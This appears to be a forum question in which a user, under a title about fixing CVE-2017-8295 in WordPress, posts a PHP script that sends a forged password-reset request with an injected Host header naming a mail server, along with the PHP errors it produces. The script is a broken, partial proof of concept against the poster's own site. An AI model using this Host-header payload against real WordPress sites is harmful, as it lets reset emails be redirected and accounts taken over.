Fix CVE-2017-8295 WordPress vulnerability

I’ve just noticed the new vulnerability discovered in WordPress and I’m trying to fix it with the following code (but with any success

<?php

$url = 'https://mywebip/wp-login.php?action=lostpassword';
$data = 'user_login=admin&redirect_to=&wp-submit=Get+New+Password';

// use key 'http' even if you send the request to https://...
$options = array(
    'http' => array(
        'header'  => "Host: mailserverrnContent-Type: application/x-www-form-urlencodedrnContent-Length: ". strlen($data) ."rn",
        'method'  => 'POST',
        'content' => $data,
        'ssl'=>array('verify_peer'=>true, 'capath'=>'/etc/ssl/certs')
    )
);
$context  = stream_context_create($options);
//$result = file_get_contents($url,  false, $context);

$fp = stream_socket_client($url, $errno, $errstr, 30);
//stream_socket_enable_crypto($fp, true, STREAM_CRYPTO_METHOD_SSLv23_CLIENT);

$fp = fopen($url, 'r', false, $context);

if ($fp === FALSE) { /* Handle error */ }

var_dump($result);
?>

The error log I got is just like this:

PHP Warning:  stream_socket_client(): unable to connect to https://mywebip/wp-login.php?action=lostpassword (Unable to find the socket transport "https" - did you forget to enable it when you configured PHP?) in /home/jorge/Escritorio/joomla.php on line 18

PHP Warning:  fopen(): Peer certificate CN=`website` did not match expected CN=`mywebip' in /home/jorge/Escritorio/joomla.php on line 21

PHP Warning:  fopen(): Failed to enable crypto in /home/jorge/Escritorio/joomla.php on line 21

PHP Warning:  fopen(https://mywebip/wp-login.php?action=lostpassword): failed to open stream: operation failed in /home/jorge/Escritorio/joomla.php on line 21

Where mywebip represents the actual ip that hosts my website and website and mailserver the DNS directions of the services.

Thank you.

Read more here: Fix CVE-2017-8295 WordPress vulnerability

Leave a Reply

Your email address will not be published. Required fields are marked *